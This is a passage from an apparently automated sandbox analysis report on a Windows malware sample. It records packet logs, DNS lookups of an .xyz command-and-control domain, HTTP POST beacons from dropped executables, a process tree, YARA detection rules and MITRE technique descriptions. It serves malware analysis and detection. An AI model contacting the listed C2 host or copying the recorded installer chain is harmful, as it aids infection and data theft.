Dec 5, 2020 08:27:33.232244968 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:33.232645035 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:33.232696056 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:33.254506111 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:33.254543066 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:34.746179104 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:34.824268103 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:34.824537992 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:34.824599981 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:34.846412897 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:34.846438885 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:39.078546047 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:27:39.127151966 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:28:33.984046936 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:34.007684946 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:34.008454084 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:34.008824110 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:34.008963108 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:34.032327890 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:34.032356024 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:37.987642050 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:38.038278103 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:39.102013111 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:28:39.128102064 CET	80	49770	172.67.194.30	192.168.2.4
Dec 5, 2020 08:28:39.128213882 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:28:46.345810890 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:46.345927954 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:46.369649887 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:46.369683027 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:47.692825079 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:47.692863941 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:47.692948103 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:47.740514040 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:47.740547895 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:28:47.764448881 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:47.764487982 CET	80	49773	104.28.5.129	192.168.2.4
Dec 5, 2020 08:28:49.805656910 CET	49773	80	192.168.2.4	104.28.5.129
Dec 5, 2020 08:29:10.881607056 CET	49774	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:10.904639006 CET	80	49774	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:10.904767990 CET	49774	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:10.931420088 CET	49774	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:10.932092905 CET	49774	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:10.953944921 CET	80	49774	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:10.954473972 CET	80	49774	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:14.676480055 CET	80	49774	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:14.776540041 CET	49774	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:15.195450068 CET	49775	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:15.217807055 CET	80	49775	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:15.217910051 CET	49775	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:15.219014883 CET	49775	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:15.219152927 CET	49775	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:29:15.241262913 CET	80	49775	172.67.194.30	192.168.2.4
Dec 5, 2020 08:29:15.241297960 CET	80	49775	172.67.194.30	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2020 08:25:52.959610939 CET	53700	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:52.986815929 CET	53	53700	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:53.761394978 CET	51726	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:53.788749933 CET	53	51726	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:54.755189896 CET	56794	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:54.790432930 CET	53	56794	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:55.449266911 CET	56534	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:55.484708071 CET	53	56534	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:56.368554115 CET	56627	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:56.395652056 CET	53	56627	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:57.170567036 CET	56621	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:57.197778940 CET	53	56621	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:57.976185083 CET	63116	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:58.011951923 CET	53	63116	8.8.8.8	192.168.2.4
Dec 5, 2020 08:25:59.600652933 CET	64078	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:25:59.635931015 CET	53	64078	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:00.279522896 CET	64801	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:00.306653976 CET	53	64801	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:01.525620937 CET	61721	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:01.552710056 CET	53	61721	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:02.837675095 CET	51255	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:02.864916086 CET	53	51255	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:03.656742096 CET	61522	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:03.692414045 CET	53	61522	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:19.153239012 CET	52337	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:19.180663109 CET	53	52337	8.8.8.8	192.168.2.4
Dec 5, 2020 08:26:43.786180019 CET	55046	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:26:43.823518038 CET	53	55046	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:06.726277113 CET	49612	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:06.763132095 CET	53	49612	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:14.884423971 CET	49285	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:14.921524048 CET	53	49285	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:20.502868891 CET	50601	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:20.538640022 CET	53	50601	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:21.181137085 CET	60875	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:21.218966961 CET	53	60875	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:21.726567030 CET	56448	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:21.763736963 CET	53	56448	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:22.117255926 CET	59172	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:22.153040886 CET	53	59172	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:22.657782078 CET	62420	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:22.693614006 CET	53	62420	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:23.103130102 CET	60579	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:23.141097069 CET	53	60579	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:23.741693020 CET	50183	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:23.760739088 CET	61531	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:23.769088984 CET	53	50183	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:23.812721968 CET	53	61531	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:26.939985991 CET	49228	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:26.977878094 CET	53	49228	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:27.542635918 CET	59794	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:27.578140020 CET	53	59794	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:28.245449066 CET	55916	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:28.272625923 CET	53	55916	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:33.160437107 CET	52752	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:33.198950052 CET	53	52752	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:47.193448067 CET	60542	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:47.220577002 CET	53	60542	8.8.8.8	192.168.2.4
Dec 5, 2020 08:27:48.154567003 CET	60689	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:27:48.190238953 CET	53	60689	8.8.8.8	192.168.2.4
Dec 5, 2020 08:28:33.931009054 CET	64206	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:28:33.971709013 CET	53	64206	8.8.8.8	192.168.2.4
Dec 5, 2020 08:29:10.792509079 CET	50904	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:29:10.828042030 CET	53	50904	8.8.8.8	192.168.2.4
Dec 5, 2020 08:29:15.148385048 CET	57525	53	192.168.2.4	8.8.8.8
Dec 5, 2020 08:29:15.184168100 CET	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 5, 2020 08:27:33.160437107 CET	192.168.2.4	8.8.8.8	0x4b27	Standard query (0)	ef6df4af06ba6896.xyz	A (IP address)	IN (0x0001)
Dec 5, 2020 08:28:33.931009054 CET	192.168.2.4	8.8.8.8	0x6a55	Standard query (0)	ef6df4af06ba6896.xyz	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:10.792509079 CET	192.168.2.4	8.8.8.8	0x4938	Standard query (0)	ef6df4af06ba6896.xyz	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:15.148385048 CET	192.168.2.4	8.8.8.8	0x1698	Standard query (0)	ef6df4af06ba6896.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 5, 2020 08:27:33.198950052 CET	8.8.8.8	192.168.2.4	0x4b27	No error (0)	ef6df4af06ba6896.xyz	172.67.194.30	A (IP address)	IN (0x0001)
Dec 5, 2020 08:27:33.198950052 CET	8.8.8.8	192.168.2.4	0x4b27	No error (0)	ef6df4af06ba6896.xyz	104.28.4.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:27:33.198950052 CET	8.8.8.8	192.168.2.4	0x4b27	No error (0)	ef6df4af06ba6896.xyz	104.28.5.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:28:33.971709013 CET	8.8.8.8	192.168.2.4	0x6a55	No error (0)	ef6df4af06ba6896.xyz	104.28.5.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:28:33.971709013 CET	8.8.8.8	192.168.2.4	0x6a55	No error (0)	ef6df4af06ba6896.xyz	172.67.194.30	A (IP address)	IN (0x0001)
Dec 5, 2020 08:28:33.971709013 CET	8.8.8.8	192.168.2.4	0x6a55	No error (0)	ef6df4af06ba6896.xyz	104.28.4.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:10.828042030 CET	8.8.8.8	192.168.2.4	0x4938	No error (0)	ef6df4af06ba6896.xyz	172.67.194.30	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:10.828042030 CET	8.8.8.8	192.168.2.4	0x4938	No error (0)	ef6df4af06ba6896.xyz	104.28.4.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:10.828042030 CET	8.8.8.8	192.168.2.4	0x4938	No error (0)	ef6df4af06ba6896.xyz	104.28.5.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:15.184168100 CET	8.8.8.8	192.168.2.4	0x1698	No error (0)	ef6df4af06ba6896.xyz	172.67.194.30	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:15.184168100 CET	8.8.8.8	192.168.2.4	0x1698	No error (0)	ef6df4af06ba6896.xyz	104.28.4.129	A (IP address)	IN (0x0001)
Dec 5, 2020 08:29:15.184168100 CET	8.8.8.8	192.168.2.4	0x1698	No error (0)	ef6df4af06ba6896.xyz	104.28.5.129	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ef6df4af06ba6896.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49770	172.67.194.30	80	C:\Program Files (x86)\71eza90awf48\aliens.exe

Timestamp	kBytes transferred	Direction	Data
Dec 5, 2020 08:27:33.232645035 CET	6223	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:27:34.746179104 CET	6224	IN	HTTP/1.1 200 OK Date: Sat, 05 Dec 2020 07:27:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=da7806b50fbfad88424fe3a77602a0fab1607153253; expires=Mon, 04-Jan-21 07:27:33 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 06d365937d0000bf326aa22000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yIIwf8o9UOIvxJWOCAiwsRwB%2FzUdvqK6D9Aj9%2Bkg0lAf73rC35NLToXm7gljsJTjSPZiJym8J%2F8Avj%2BxeZCcPujkGJgFKfvXpdBIZwETFypU9mizjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fcc0b98cfa5bf32-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 5, 2020 08:27:34.824537992 CET	6225	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:27:39.078546047 CET	6226	IN	HTTP/1.1 200 OK Date: Sat, 05 Dec 2020 07:27:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d5103f4340e20344d18948f6707fd78171607153254; expires=Mon, 04-Jan-21 07:27:34 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 06d36599b40000bf3260889000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=18CAB5U0aqtJlxIP%2BPmV0%2BQm8J0Krgzq7gX7qJw3jTirqD3uJg09pSYa9gJB%2BobmR7QZqLAEjC6njGgo4ugqrkmlUYIW9L%2FdWFjHtk9y3PLlUAiYEA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fcc0ba2baf1bf32-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49773	104.28.5.129	80	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe

Timestamp	kBytes transferred	Direction	Data
Dec 5, 2020 08:28:34.008824110 CET	6270	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:28:37.987642050 CET	6271	IN	HTTP/1.1 200 OK Date: Sat, 05 Dec 2020 07:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7d2ffa144f8c7d410ce0423e8b128f0d1607153314; expires=Mon, 04-Jan-21 07:28:34 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 06d36680e40000410e61317000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2kRxqQaS1W77zmFOr8h2V7YzMpEUHFsgs5TYXL7fUMRiVqISCHk5ilW7p2sq7psGuQ%2FeutaEXiEAjdfWEbkK5PBBpe0WryMTqfp8jZbzJyGxdYIdyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fcc0d14ad69410e-PRG Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 5, 2020 08:28:46.345810890 CET	6272	OUT	POST /info/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 677 Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:28:47.692825079 CET	6273	IN	HTTP/1.1 200 OK Date: Sat, 05 Dec 2020 07:28:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d68ab5bc6a534a0c80f1d6d31a789d16c1607153326; expires=Mon, 04-Jan-21 07:28:46 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 06d366b1160000410eb08eb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yB4UbUvU%2FFsjx%2BEoViTs2I2pXhby%2FZaiHN6aCdvUpV4%2BsjqsEJJy5niANpT6n3wrlMtDBZwX10OYWs8Hn6dAP0s%2FdiVaJoFeyUSynWhAKJbPbNB%2Bug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fcc0d61ba58410e-PRG Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
Dec 5, 2020 08:28:47.740514040 CET	6274	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: ef6df4af06ba6896.xyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49774	172.67.194.30	80	C:\Program Files (x86)\71eza90awf48\aliens.exe

Timestamp	kBytes transferred	Direction	Data
Dec 5, 2020 08:29:10.931420088 CET	6275	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 93 Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:29:14.676480055 CET	6276	IN	HTTP/1.1 200 OK Date: Sat, 05 Dec 2020 07:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d0459c9d77a4504015ca9584f43530e921607153350; expires=Mon, 04-Jan-21 07:29:10 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 06d367111f00001ed21e28b000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2Bgo6%2B63KclBwQsJv7XOGM%2BwJdBZLj2LfB%2BORJZXVdVvLdPxYrFTiwKseD1Z%2BU%2FZjYBYpU0pT0QZY8iteaIp2E2%2Fmx4ly3pxx82MGWOdPqPMxigWSWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fcc0dfb6d6c1ed2-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49775	172.67.194.30	80	C:\Program Files (x86)\71eza90awf48\aliens.exe

Timestamp	kBytes transferred	Direction	Data
Dec 5, 2020 08:29:15.219014883 CET	6277	OUT	POST /info/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: ef6df4af06ba6896.xyz

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: h1GodtbhC8.exe PID: 6364 Parent PID: 5184

General

Start time:	08:25:59
Start date:	05/12/2020
Path:	C:\Users\user\Desktop\h1GodtbhC8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\h1GodtbhC8.exe'
Imagebase:	0x400000
File size:	4671378 bytes
MD5 hash:	3CA6DF4914385EFD4BA9CD239B5ED254
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: setup.exe PID: 5840 Parent PID: 6364

General

Start time:	08:26:01
Start date:	05/12/2020
Path:	C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s
Imagebase:	0x8a0000
File size:	4387715 bytes
MD5 hash:	69C9BA53239D6838D05594D96A36DEA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: aliens.exe PID: 1320 Parent PID: 5840

General

Start time:	08:27:09
Start date:	05/12/2020
Path:	C:\Program Files (x86)\71eza90awf48\aliens.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Imagebase:	0x400000
File size:	506545472 bytes
MD5 hash:	87698F069716708B6743A580B1D0D0CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000006.00000002.1010080806.0000000004870000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: msiexec.exe PID: 6976 Parent PID: 1320

General

Start time:	08:27:32
Start date:	05/12/2020
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0x1300000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: msiexec.exe PID: 7068 Parent PID: 5008

General

Start time:	08:27:34
Start date:	05/12/2020
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 137E5E97B7A1A176AEBB5BF742E73DAB C
Imagebase:	0x1300000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 1E1C360C582DF797.exe PID: 4652 Parent PID: 1320

General

Start time:	08:28:28
Start date:	05/12/2020
Path:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Imagebase:	0x400000
File size:	506545472 bytes
MD5 hash:	87698F069716708B6743A580B1D0D0CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000F.00000002.1022272308.00000000059A9000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 0000000F.00000002.1010698141.0000000004790000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 1E1C360C582DF797.exe PID: 7156 Parent PID: 1320

General

Start time:	08:29:09
Start date:	05/12/2020
Path:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Wow64 process (32bit):
Commandline:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Imagebase:
File size:	506545472 bytes
MD5 hash:	87698F069716708B6743A580B1D0D0CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: 1607153318099.exe PID: 6940 Parent PID: 4652

General

Start time:	08:28:38
Start date:	05/12/2020
Path:	C:\Users\user\AppData\Roaming\1607153318099.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
